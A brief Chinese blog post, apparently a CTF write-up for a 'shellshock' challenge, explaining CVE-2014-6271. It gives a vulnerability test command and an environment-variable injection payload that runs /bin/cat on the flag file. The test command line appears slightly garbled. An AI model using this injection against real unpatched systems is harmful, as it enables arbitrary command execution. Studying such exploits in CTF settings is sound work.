shellshock题解思路分享

本文主要是介绍shellshock题解思路分享，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

shellshock

考查bash远程任意代码执行漏洞。


可以看到含有bash文件，使用以下命令测试bash是否受shellshock影响

env x='() { :;}; echo test' ./bash -c:test

受影响，执行bash远程任意代码执行漏洞

env x='() { :;}; /bin/cat flag' ./shellshock

具体可以看看CVE-2014-6271的detail。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271

这篇关于shellshock题解思路分享的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---